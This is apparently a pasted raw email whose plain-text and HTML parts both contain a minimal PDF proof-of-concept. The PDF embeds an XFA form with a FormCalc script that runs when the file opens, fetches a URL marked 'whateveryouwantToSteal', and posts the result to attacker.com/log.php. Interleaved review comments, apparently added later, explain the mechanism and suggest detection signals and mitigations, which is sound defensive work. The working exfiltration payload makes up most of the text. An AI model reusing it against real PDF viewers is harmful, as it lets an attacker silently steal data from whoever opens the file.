
Untitled

a guest
Apr 22nd, 2018
  1. MIME-Version: 1.0
  2. Received: by 10.28.182.11 with HTTP; Sun, 22 Apr 2018 16:15:55 -0700 (PDT)
  3. X-Originating-IP: [178.115.227.190]
  4. Date: Mon, 23 Apr 2018 01:15:55 +0200
  5. Delivered-To: missoum@missoumsai.us
  6. Message-ID: <CAMob-0kdu-GTip_TFhkg-6Bz9n5xz9hFZvAA6OOFj_mZyNjoiQ@mail.gmail.com>
  7. Subject: test
  8. From: zezae eazaeeza <missoum@missoumsai.us>
  9. To: ezaeza zezaeza <m@missoumsai.us>, missoumozil@gmail.com
  10. Content-Type: multipart/alternative; boundary="001a11423f3865ef7d056a781a8d"
  11.  
  12. --001a11423f3865ef7d056a781a8d
  13. Content-Type: text/plain; charset="UTF-8"
  14.  
  15. % a PDF file using an XFA
  16. % most whitespace can be removed (truncated to 570 bytes or so...)
  17. % Ange Albertini BSD Licence 2012
  18. % modified by insertscript
      % NOTE(review): minimal hand-written PDF whose single object carries an XFA
      % (XDP) form; the trailer's /AcroForm /XFA entry is what references it.
  19.  
  20. %PDF-1. % can be truncated to %PDF-\0
      % NOTE(review): per the author's comments the header and whitespace can be
      % shortened, so an upload or mail filter should not depend on seeing a full,
      % well-formed %PDF-1.x signature before treating content as a PDF.
  21.  
  22. 1 0 obj <<>>
  23. stream
  24. <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  25. <config><present><pdf>
  26. <interactive>1</interactive>
  27. </pdf></present></config>
  28.  
  29. <template>
  30. <subform name="_">
  31. <pageSet/>
  32. <field id="Hello World!">
  33. <event activity="initialize">
  34. <script contentType='application/x-formcalc'>
  35. var content =
  36. GET("http://example.com/whateveryouwantToSteal")
  37. POST("http://attacker.com/log.php",content)
  38. </script>
  39. </event>
  40. </field>
  41. </subform>
  42. </template>
  43. </xdp:xdp>
  44. endstream
  45. endobj
  46.  
      % NOTE(review): the template above has one field whose "initialize" event
      % holds a FormCalc script: GET() fetches one URL and POST() forwards the
      % response to a second host. Both URLs look like placeholders.
      % For triage: an /XFA entry together with FormCalc GET/POST calls in an
      % initialize event is a strong signal that a PDF needs a closer look.
      % Presumably these requests run in the network context of whatever viewer
      % opens the file, so serving untrusted PDFs as downloads or from a separate
      % origin should limit exposure - confirm against the viewer in use.
  47. trailer <<
  48. /Root <<
  49. /AcroForm <<
  50. /Fields [<<
  51. /T (0)
  52. /Kids [<<
  53. /Subtype /Widget
  54. /Rect []
  55. /T ()
  56. /FT /Btn
  57. >>]
  58. >>]
  59. /XFA 1 0 R
  60. >>
  61. /Pages <<>>
  62. >>
  63. >>
  64.  
  65. --001a11423f3865ef7d056a781a8d
  66. Content-Type: text/html; charset="UTF-8"
  67. Content-Transfer-Encoding: quoted-printable
  68.  
  69. <div dir=3D"ltr"><pre style=3D"color:rgb(0,0,0);font-style:normal;font-vari=
  70. ant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacin=
  71. g:normal;text-align:start;text-indent:0px;text-transform:none;word-spacing:=
  72. 0px;text-decoration-style:initial;text-decoration-color:initial;word-wrap:b=
  73. reak-word;white-space:pre-wrap">% a PDF file using an XFA
  74. % most whitespace can be removed (truncated to 570 bytes or so...)
  75. % Ange Albertini BSD Licence 2012
  76. % modified by insertscript
  77.  
  78. %PDF-1. % can be truncated to %PDF-\0
  79.  
  80. 1 0 obj &lt;&lt;&gt;&gt;
  81. stream
  82. &lt;xdp:xdp xmlns:xdp=3D&quot;<a href=3D"http://ns.adobe.com/xdp/">http://n=
  83. s.adobe.com/xdp/</a>&quot;&gt;
  84. &lt;config&gt;&lt;present&gt;&lt;pdf&gt;
  85. &lt;interactive&gt;1&lt;/interactive&gt;
  86. &lt;/pdf&gt;&lt;/present&gt;&lt;/config&gt;
  87.  
  88. &lt;template&gt;
  89. &lt;subform name=3D&quot;_&quot;&gt;
  90. &lt;pageSet/&gt;
  91. &lt;field id=3D&quot;Hello World!&quot;&gt;
  92. &lt;event activity=3D&quot;initialize&quot;&gt;
  93. &lt;script contentType=3D&#39;application/x-formcalc&#39;&g=
  94. t;
  95. var content =3D GET(&quot;<a href=3D"http://example.com=
  96. /whateveryouwantToSteal">http://example.com/whateveryouwantToSteal</a>&quot=
  97. ;)
  98. POST(&quot;<a href=3D"http://attacker.com/log.php">http=
  99. ://attacker.com/log.php</a>&quot;,content)
  100. &lt;/script&gt;
  101. &lt;/event&gt;
  102. &lt;/field&gt;
  103. &lt;/subform&gt;
  104. &lt;/template&gt;
  105. &lt;/xdp:xdp&gt;
  106. endstream
  107. endobj
  108.  
  109. trailer &lt;&lt;
  110. /Root &lt;&lt;
  111. /AcroForm &lt;&lt;
  112. /Fields [&lt;&lt;
  113. /T (0)
  114. /Kids [&lt;&lt;
  115. /Subtype /Widget
  116. /Rect []
  117. /T ()
  118. /FT /Btn
  119. &gt;&gt;]
  120. &gt;&gt;]
  121. /XFA 1 0 R
  122. &gt;&gt;
  123. /Pages &lt;&lt;&gt;&gt;
  124. &gt;&gt;
  125. &gt;&gt;</pre><br></div>
  126.  
  127. --001a11423f3865ef7d056a781a8d--